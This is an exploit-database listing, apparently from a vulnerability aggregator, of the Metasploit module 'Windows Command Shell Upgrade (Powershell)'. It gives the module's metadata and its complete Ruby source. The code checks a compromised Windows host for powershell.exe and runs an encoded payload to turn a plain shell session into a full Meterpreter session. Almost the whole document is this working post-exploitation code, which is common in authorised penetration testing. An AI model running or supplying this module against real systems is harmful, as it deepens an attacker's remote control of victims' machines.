Windows Command Shell Upgrade (Powershell)

2014-02-02T19:04:38
ID MSF:EXPLOIT/WINDOWS/LOCAL/POWERSHELL_CMD_UPGRADE
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

This module executes Powershell to upgrade a Windows Shell session to a full Meterpreter session.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::File

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Windows Command Shell Upgrade (Powershell)',
        'Description'   => %q{
          This module executes Powershell to upgrade a Windows Shell session
          to a full Meterpreter session.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Ben Campbell'
          ],
        'DefaultOptions' =>
            {
                'WfsDelay'     => 10,
            },
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'      => [ 'win' ],
        'SessionTypes'  => [ 'shell' ],
        'Targets' => [ [ 'Universal', {} ] ],
        'DefaultTarget' => 0
      ))
  end

  def exploit
    psh_path = "\\WindowsPowerShell\\v1.0\\powershell.exe"

    if file? "%WINDIR%\\System32#{psh_path}"
      print_status("Executing powershell command line...")
      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
      cmd_exec(command)
    else
      fail_with(Failure::NotVulnerable, "No powershell available.")
    end
  end
end